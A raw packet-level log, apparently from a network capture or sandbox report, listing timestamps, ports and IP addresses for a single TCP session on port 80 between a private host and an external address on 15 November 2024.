Nov 15, 2024 14:09:25.543328047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.543330908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.543334961 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.543348074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.543369055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.543390989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.543415070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.544893026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.544910908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.544925928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.544940948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.544944048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.544965982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.544972897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.544974089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.544982910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.545022964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550124884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550149918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550167084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550175905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550185919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550194979 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550204039 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550204039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550221920 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550223112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550263882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550263882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550741911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550760984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.550790071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.550805092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551183939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551202059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551218033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551235914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551253080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551254988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551289082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551289082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551846027 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551863909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551881075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551892042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551898956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551908016 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551917076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551928997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551934958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.551939011 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551963091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.551970005 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.554970980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.554990053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555005074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555017948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555022001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555033922 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555038929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555047989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555066109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555094004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555660009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555679083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555695057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555711985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555713892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555721998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555731058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555747986 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.555752039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555773973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.555785894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562688112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562695026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562715054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562731981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562738895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562748909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562750101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562767982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562777996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562784910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562800884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562807083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562807083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562818050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562827110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562836885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562854052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.562859058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562886000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.562911034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.566179037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.566204071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.566221952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.566235065 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.566240072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.566251040 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.566265106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.566265106 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.566284895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.566293001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.566309929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.566318989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.570379019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.570398092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.570413113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.570429087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.570451975 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.570486069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.570554972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.570609093 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.571250916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.571269035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.571285009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.571302891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.571316957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.571327925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.571345091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.571345091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.571372032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.571391106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.574371099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.574388981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.574404955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.574419975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.574426889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.574438095 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.574440002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.574474096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.578142881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.578167915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.578185081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.578197002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.578202009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.578217983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.578228951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.578249931 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.642571926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642591953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642610073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642633915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642647982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642663956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642682076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.642755032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.642755032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.642755032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.642755032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.643557072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.643578053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.643594980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.643611908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.643626928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.643665075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.643682003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.645970106 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.645987988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646003962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646020889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646023989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646035910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646043062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646051884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646074057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646101952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646447897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646475077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646491051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646505117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646511078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646523952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646538019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.646542072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646565914 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.646579027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649117947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649135113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649149895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649166107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649168015 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649179935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649183989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649199963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649209976 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649215937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649231911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649235010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649245977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649255991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649274111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649619102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649645090 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649662018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649677992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649681091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649696112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649703026 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649717093 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.649724960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649744987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.649758101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652012110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652030945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652046919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652062893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652065992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652076006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652080059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652090073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652107000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652117968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652420044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652437925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652452946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652467012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652470112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652484894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652487040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652504921 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652513981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652522087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652533054 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652538061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.652542114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652561903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.652571917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654387951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654407024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654422998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654439926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654454947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654472113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654474974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654500008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654515028 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654874086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654891014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654913902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654926062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654931068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654947042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654947996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654959917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654968977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.654972076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.654994965 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.655002117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.657083988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.657102108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.657115936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.657131910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.657135963 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.657144070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.657161951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.657182932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.657798052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.657816887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.657851934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.657867908 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.658474922 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.658493042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.658507109 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.658525944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.658534050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.658534050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.658552885 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.658570051 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.660135984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.660154104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.660170078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.660187006 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.660193920 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.660208941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.660218000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.661950111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.661967993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.661982059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.661998034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.662003040 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.662014008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.662018061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.662055016 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.662075996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.663204908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.663223982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.663239002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.663259983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.663269997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.663269997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.663304090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.664592028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.664598942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.664604902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.664621115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.664637089 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.664669037 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665015936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665060997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665077925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665091991 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665096045 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665107965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665111065 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665132999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665153027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665832043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665849924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665864944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665880919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665884018 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665893078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665898085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.665910006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665936947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.665958881 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.668438911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.668456078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.668471098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.668487072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.668490887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.668499947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.668504000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.668530941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.668553114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.669270992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.669289112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.669303894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.669321060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.669327021 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.669337988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.669341087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.669367075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.669384956 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.671325922 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.671343088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.671360016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.671375036 CET	80	49752	185.215.113.206	192.168.2.4
